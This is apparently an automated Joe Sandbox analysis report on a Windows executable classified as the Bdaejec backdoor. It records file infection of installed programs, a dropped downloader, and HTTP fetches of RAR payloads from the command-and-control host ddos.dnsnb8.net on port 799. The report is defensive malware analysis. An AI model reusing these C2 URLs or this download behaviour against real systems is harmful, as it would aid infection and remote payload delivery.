Edit tour

Windows Analysis Report
biKy3nZEyJ.exe

Overview

General Information

Sample name:	biKy3nZEyJ.exe renamed because original name is a hash value
Original sample name:	98DC44E47B06318EBD73414912CD60F5FF71B3FE172476D353B4DDA39C7DC327.exe
Analysis ID:	1480645
MD5:	6963bb0311ded02ba57657ba4a61d427
SHA1:	777ed3376f2b380fef0658e6b1ab4a90e4dca901
SHA256:	98dc44e47b06318ebd73414912cd60f5ff71b3fe172476d353b4dda39c7dc327
Tags:	exe
Infos:

Detection

Bdaejec

Score:	81
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Yara detected Bdaejec

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

biKy3nZEyJ.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\biKy3nZEyJ.exe" MD5: 6963BB0311DED02BA57657BA4A61D427)

TJytnf.exe (PID: 7356 cmdline: C:\Users\user\AppData\Local\Temp\TJytnf.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 7528 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7356 -s 1580 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: TJytnf.exe PID: 7356	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-07-24T22:22:34.069820+0200
SID:	2838522
Source Port:	62273
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T22:22:34.622058+0200
SID:	2807908
Source Port:	49730
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-24T22:22:39.755674+0200
SID:	2807908
Source Port:	49731
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: biKy3nZEyJ.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManageru	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarb	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/E	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarA	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar:	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar4u	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarw	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarV	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: biKy3nZEyJ.exe

Joe Sandbox ML: detected

Source: biKy3nZEyJ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdb source: biKy3nZEyJ.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source:	Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdbe source: biKy3nZEyJ.exe

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 1_2_00C029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00C029E2

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 1_2_00C02B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00C02B8C

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 799

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 1_2_00C01099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

1_2_00C01099

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: TJytnf.exe, 00000001.00000003.1795628284.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/E
Source: TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981067567.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar:
Source: TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarV
Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar4u
Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarA
Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManageru
Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarb
Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarw
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_2f12400c-c

System Summary

PE file contains section with special chars

Source: biKy3nZEyJ.exe	Static PE information: section name: A#uq
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: TJytnf.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00452810	0_2_00452810
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_0044DC20	0_2_0044DC20
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00442030	0_2_00442030
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00442970	0_2_00442970
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00451E50	0_2_00451E50
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_0044DAC0	0_2_0044DAC0
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_004522C0	0_2_004522C0
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_004492E0	0_2_004492E0
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00441360	0_2_00441360
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_0040431D	0_2_0040431D
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Code function: 1_2_00C06076	1_2_00C06076
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Code function: 1_2_00C06D00	1_2_00C06D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\TJytnf.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7356 -s 1580

Source: MyProg.exe.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: biKy3nZEyJ.exe, 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNHASPX.exeF vs biKy3nZEyJ.exe
Source: biKy3nZEyJ.exe	Binary or memory string: OriginalFilenameNHASPX.exeF vs biKy3nZEyJ.exe

Source: biKy3nZEyJ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: TJytnf.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: TJytnf.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: TJytnf.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal81.spre.troj.evad.winEXE@5/11@1/1

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Code function: 1_2_00C0119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_00C0119F

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7356

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe

File created: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Jump to behavior

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\biKy3nZEyJ.exe "C:\Users\user\Desktop\biKy3nZEyJ.exe"
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Process created: C:\Users\user\AppData\Local\Temp\TJytnf.exe C:\Users\user\AppData\Local\Temp\TJytnf.exe
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7356 -s 1580
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Process created: C:\Users\user\AppData\Local\Temp\TJytnf.exe C:\Users\user\AppData\Local\Temp\TJytnf.exe	Jump to behavior

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: biKy3nZEyJ.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: biKy3nZEyJ.exe

Static file information: File size 3101704 > 1048576

Source: biKy3nZEyJ.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x259600

Source: biKy3nZEyJ.exe

Static PE information: More than 200 imports for USER32.dll

Source: biKy3nZEyJ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdb source: biKy3nZEyJ.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source:	Binary string: E:\XUtilities\HASP Programs\NHaspX\Release\NHaspX.pdbe source: biKy3nZEyJ.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\TJytnf.exe

Unpacked PE file: 1.2.TJytnf.exe.c00000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: A#uq

Source: biKy3nZEyJ.exe	Static PE information: section name: CONST
Source: biKy3nZEyJ.exe	Static PE information: section name: A#uq
Source: TJytnf.exe.0.dr	Static PE information: section name: .aspack
Source: TJytnf.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00401840 push 00411729h; ret	0_2_00401845
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00405846 push ecx; retn 006Dh	0_2_00405847
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00403454 push 00406339h; ret	0_2_00403468
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00402455 push FFFFFF86h; ret	0_2_00402457
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00404C6D push 0040598Ch; ret	0_2_00404CAC
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_0040187A push 0041A712h; ret	0_2_00401887
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00407C04 push 00424CBFh; ret	0_2_00407C0C
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_0040740B push 00436788h; ret	0_2_00407417
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00403818 push 00407F45h; ret	0_2_00403844
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00406418 push 00409DE9h; ret	0_2_00406428
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00401C1D push 00430E02h; ret	0_2_00401C56
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00401C1F push 00430E02h; ret	0_2_00401C56
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00402C2E push 0041D9C4h; ret	0_2_00402C4D
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00439439 push 0041340Eh; ret	0_2_0043D062
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_0040C8CA push 00407821h; ret	0_2_0040C8CF
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_004074EE push 0042BE47h; ret	0_2_004074F4
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_004048F8 push 00404966h; ret	0_2_00404908
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_004158FE push 00420E3Ch; ret	0_2_00415907
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00405098 push ecx; ret	0_2_0040509B
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_004018B1 push 0040CC1Bh; ret	0_2_004018BD
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_004054B4 push 004294D3h; ret	0_2_004054CD
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_0040CD41 push 00409805h; ret	0_2_0040CD5E
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00402142 push 0043780Dh; ret	0_2_00402BD0
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00407542 push 0042086Ch; ret	0_2_00407564
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00405145 push 00413471h; ret	0_2_00405159
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00402548 push 0042B124h; ret	0_2_0040254E
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00403156 push 0042FB70h; ret	0_2_00403163
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_00402163 push 0040E9AFh; ret	0_2_0042FDA6
Source: C:\Users\user\Desktop\biKy3nZEyJ.exe	Code function: 0_2_0041A96D push 0041AC46h; ret	0_2_0041A976
